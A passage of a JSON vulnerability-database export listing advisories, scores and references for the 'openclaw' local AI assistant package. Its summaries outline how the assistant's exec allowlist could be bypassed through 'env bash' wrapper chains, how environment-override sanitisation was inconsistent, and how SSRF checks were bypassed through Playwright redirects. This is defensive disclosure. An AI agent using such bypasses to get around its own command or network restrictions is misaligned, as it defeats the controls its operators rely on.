lity":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.8"}],"aliases":["CVE-2026-33574","GHSA-vhwf-4x96-vqx2"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-h4av-vgqn-aqcn"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91631?format=json","vulnerability_id":"VCID-h8vg-ewrr-tfec","summary":"Duplicate Advisory: Exec allowlist wrapper analysis did not unwrap env/shell dispatch chains\n## Duplicate Advisory\n\nThis advisory has been withdrawn because it is a duplicate of GHSA-jj82-76v6-933r. This link is maintained to preserve external references.\n\n## Original Description\nOpenClaw versions prior to 2026.2.22 contain an allowlist bypass vulnerability in system.run exec analysis that fails to unwrap env and shell-dispatch wrapper chains. Attackers can route execution through wrapper binaries like env bash to smuggle payloads that satisfy allowlist entries while executing non-allowlisted commands.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/2b63592be57782c8946e521bc81286933f0f99c7","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/2b63592be57782c8946e521bc81286933f0f99c7"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-allowlist-bypass-via-wrapper-binary-unwrapping-in-system-run","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-allowlist-bypass-via-wrapper-binary-unwrapping-in-system-run"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-27566","reference_id":"CVE-2026-27566","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-27566"},{"reference_url":"https://github.com/advisories/GHSA-3846-mfvc-xwpf","reference_id":"GHSA-3846-mfvc-xwpf","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-3846-mfvc-xwpf"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-jj82-76v6-933r","reference_id":"GHSA-jj82-76v6-933r","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-jj82-76v6-933r"}],"fixed_packages":[],"aliases":["GHSA-3846-mfvc-xwpf"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-h8vg-ewrr-tfec"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91383?format=json","vulnerability_id":"VCID-h9g5-xe4k-6udx","summary":"OpenClaw has Inconsistent Host Exec Environment Override Sanitization\n## Summary\nGateway host exec env override handling did not consistently apply the shared host environment policy, so blocked or malformed override keys could slip through inconsistent sanitization paths.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `7abfff756d6c68d17e21d1657bbacbaec86de232`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- src/infra/host-env-security.ts now provides one shared sanitizer and fail-closed diagnostics for blocked or malformed override keys.\n- src/agents/bash-tools.exec.ts and src/node-host/invoke-system-run.ts both route env overrides through the shared sanitizer before execution.\n\nOpenClaw thanks @zpbrent for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35650","reference_id":"","reference_type":"","scores":[{"value":"0.00081","scoring_system":"epss","scoring_elements":"0.23939","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00081","scoring_system":"epss","scoring_elements":"0.2399","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00081","scoring_system":"epss","scoring_elements":"0.24008","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35650"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-10T18:22:30Z/"}],"url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"},{"reference_url":"https://github.com/openclaw/openclaw/commit/7abfff756d6c68d17e21d1657bbacbaec86de232","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-10T18:22:30Z/"}],"url":"https://github.com/openclaw/openclaw/commit/7abfff756d6c68d17e21d1657bbacbaec86de232"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-39pp-xp36-q6mg","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-10T18:22:30Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-39pp-xp36-q6mg"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35650","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35650"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-environment-variable-override-bypass-via-inconsistent-sanitization","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-10T18:22:30Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-environment-variable-override-bypass-via-inconsistent-sanitization"},{"reference_url":"https://github.com/advisories/GHSA-39pp-xp36-q6mg","reference_id":"GHSA-39pp-xp36-q6mg","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-39pp-xp36-q6mg"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109983?format=json","purl":"pkg:npm/openclaw@2026.3.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"}],"aliases":["CVE-2026-35650","GHSA-39pp-xp36-q6mg"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-h9g5-xe4k-6udx"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89343?format=json","vulnerability_id":"VCID-haxd-ps1x-h3ch","summary":"OpenClaw: Strict browser SSRF bypass in Playwright redirect handling leaves private targets reachable\n## Impact\n\nStrict browser SSRF bypass in Playwright redirect handling leaves private targets reachable.\n\nStrict browser SSRF checks could miss Playwright request-time navigation to private targets.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `2026.3.8`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @smaeljaish771 for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42430","reference_id":"","reference_type":"","scores":[{"value":"0.00033","scoring_system":"epss","scoring_elements":"0.10088","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00033","scoring_system":"epss","scoring_elements":"0.10118","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00033","scoring_system":"epss","scoring_elements":"0.10102","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42430"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:L/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:L/A:N"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:H/SI:L/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-30T12:56:41Z/"}],"url":"https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-w8g9-x8gx-crmm","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"4.8","scoring_s